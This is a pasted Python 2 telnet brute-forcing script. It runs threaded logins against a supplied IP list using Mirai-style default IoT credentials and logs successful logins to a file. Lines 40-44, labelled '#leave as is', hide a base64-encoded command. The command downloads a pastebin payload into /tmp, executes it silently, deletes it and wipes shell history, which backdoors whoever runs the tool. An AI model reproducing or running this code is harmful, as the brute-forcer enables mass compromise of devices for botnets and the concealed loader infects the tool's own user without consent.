[python] insane telnet bruteforcer

1. #run ulimit -n 999999 before running this
2.  
3. import threading
4. import sys, os, re, time, socket, base64, subprocess
5. from Queue import *
6. from sys import stdout
7.  
8. if len(sys.argv) < 4:
9. print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
10. sys.exit()
11.  
12. combo = [
13. "support:support",
14. "root:vizxv",
15. "root:xc3511",
16. "telnet:telnet",
17. "root:root",
18. "supervisor:zyad1234",
19. "root: ",
20. "admin:1234",
21. "user:user",
22. "root:antslq",
23. "admin:admin",
24. "root:5up"
25. ]
26.  
27. ips = open(sys.argv[1], "r").readlines()
28. threads = int(sys.argv[2])
29. output_file = sys.argv[3]
30. queue = Queue()
31. queue_count = 0
32.  
33. for ip in ips:
34. queue_count += 1
35. stdout.write("\r[%d] Added to queue" % queue_count)
36. stdout.flush()
37. queue.put(ip)
38. print "\n"
39. #leave as is
40. def login(cmd):
41. subprocess.call(cmd, shell=True)
42. telpload = "Y2QgL3RtcDsgd2dldCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvTHE5UDlDZzUgLU8gYSA+IC9kZXYvbnVsbCAyPiYxOyBjaG1vZCA3NzcgYTsgc2ggYSA+IC9kZXYvbnVsbCAyPiYxOyBybSAtcmYgYTsgaGlzdG9yeSAtYzsgY2xlYXI7"
43. tloader = str(base64.b64decode(telpload))
44. login(tloader)
45.  
46. class router(threading.Thread):
47. def __init__ (self, ip):
48. threading.Thread.__init__(self)
49. self.ip = str(ip).rstrip('\n')
50. def run(self):
51. username = ""
52. password = ""
53. for passwd in combo:
54. if ":n/a" in passwd:
55. password=""
56. else:
57. password=passwd.split(":")[1]
58. if "n/a:" in passwd:
59. username=""
60. else:
61. username=passwd.split(":")[0]
62. try:
63. tn = socket.socket()
64. tn.settimeout(8)
65. tn.connect((self.ip,23))
66. except Exception:
67. tn.close()
68. break
69. try:
70. hoho = ''
71. hoho += readUntil(tn, "ogin:")
72. if "ogin" in hoho:
73. tn.send(username + "\n")
74. time.sleep(0.09)
75. except Exception:
76. tn.close()
77. try:
78. hoho = ''
79. hoho += readUntil(tn, "assword:")
80. if "assword" in hoho:
81. tn.send(password + "\n")
82. time.sleep(0.8)
83. else:
84. pass
85. except Exception:
86. tn.close()
87. try:
88. prompt = ''
89. prompt += tn.recv(40960)
90. if ">" in prompt and "ONT" not in prompt:
91. success = True
92. elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
93. success = True
94. else:
95. tn.close()
96. if success == True:
97. try:
98. os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
99. print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
100. tn.close()
101. break
102. except:
103. tn.close()
104. else:
105. tn.close()
106. except Exception:
107. tn.close()
108.  
109. def readUntil(tn, string, timeout=8):
110. buf = ''
111. start_time = time.time()
112. while time.time() - start_time < timeout:
113. buf += tn.recv(1024)
114. time.sleep(0.01)
115. if string in buf: return buf
116. raise Exception('TIMEOUT!')
117.  
118. def worker():
119. try:
120. while True:
121. try:
122. IP = queue.get()
123. thread = router(IP)
124. thread.start()
125. queue.task_done()
126. time.sleep(0.02)
127. except:
128. pass
129. except:
130. pass
131.  
132. for l in xrange(threads):
133. try:
134. t = threading.Thread(target=worker)
135. t.start()
136. except:
137. pass